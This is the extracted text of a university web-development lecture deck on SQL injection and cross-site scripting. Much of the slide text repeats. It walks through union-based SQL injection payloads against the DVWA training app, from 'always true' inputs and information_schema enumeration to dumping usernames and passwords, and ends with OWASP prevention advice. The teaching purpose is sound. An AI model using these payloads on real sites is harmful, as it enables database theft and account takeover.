sql injection and xss

webdev@rgusql injection and XSS

a word of warning

Everything that we are going over today, while practical, is meant for penetration testing only! You’ll get in a lot of trouble if you use this on live websites that you don’t own!

Also…the fuzz will come after you.

what is sql injection


SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.


This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).

SQL injection is a code injection technique that exploits a security vulnerability in an application's software.


This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).


The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.


The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.

SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.


http://www.bugtracker.com/bugs.php?bugID=007

SELECT * FROM softwareBugs WHERE bugID = $_GET[‘bugID’]



SELECT * FROM softwareBugs WHERE bugID = 007


http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE

SELECT * FROM softwareBugs WHERE bugID = 007 OR TRUE

can be used to gain access to all bugs


worse example

http://www.bugtracker.com/changepassword.php?userID=1234&pass=mynewpass

UPDATE Users SET password = ‘pass’ WHERE userID = 1234

http://www.bugtracker.com/changepassword.php?userID=1234&pass=mynewpass

worse example

http://www.bugtracker.com/changepassword.php?userID=1234 OR TRUE &pass=mynewpass

changes all user passwords!

UPDATE Users SET password = ‘pass’ WHERE userID = 1234 or TRUE

http://www.bugtracker.com/changepassword.php?userID=1234

this is easy though…who would get caught out with an

sql injection attack!?

Archos 2014

Wordpress February 2015

Drupal Attack March 2015

in-depth SQL injection

attack

dvwa

This is DVWA.All of our SQL injection is going to happen using this userID box

1

No SQL injection, just putting normal data into the form

%' or '0'='0

%' or '0'='0

All information from a table, ‘Always True’ injection

%' or 0=0 union select null, version() #

%' or 0=0 union select null, version() #

Finding out server information

%' or 0=0 union select null, user() #

%' or 0=0 union select null, user() #

Finding out the database location

%' or 0=0 union select null, database() #

%' or 0=0 union select null, database() #

finding out the name of the database

%' and 1=0 union select null, table_name from information_schema.tables #

%' and 1=0 union select null, table_name from information_schema.tables #

Information_Schema part of the database

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

finding tables that mention the word ‘user’ at the start

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Finding the names of all the fields from the table ‘users’

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

finding all of the information stored in the table users

And this is what we are after! The admin password!

what is Cross site Scripting

What is cross site scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.

XSS enables attackers to inject client-side script into Web pages viewed by other users.

A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

What is cross site scripting

In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.

The victim's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.


Displays an alert message when a person visits the screen


Creates an iframe that can hold information from another site


Displays an alert message with the users current cookie

(I’m sorry)

protecting against sql

injection and xss

sql injection

Prepared Statements Stored Procedures Escaping all user supplied input

Least Privilege White List Validation

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Never insert untrusted data except in allowed locations HTML Escape before inserting untrusted data into HTML Attribute Escape… Javascript Escape… CSS Escape… URL Escape…

In other words…check EVERYTHING! XSS is very common and is really easy to exploit

XSS

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

We’re going to do a lot more protection in the lab…don’t worry!

is that it!?

Going to give you a chance to improve a websites security in terms of SQL injection and XSS vulnerabilities.

If you want to try some of these things out yourself…we’re working on it

Getting DVWA to work properly on a secure network is difficult, even ours!

webdev@rgusql injection and XSS

sql injection and xss

Internet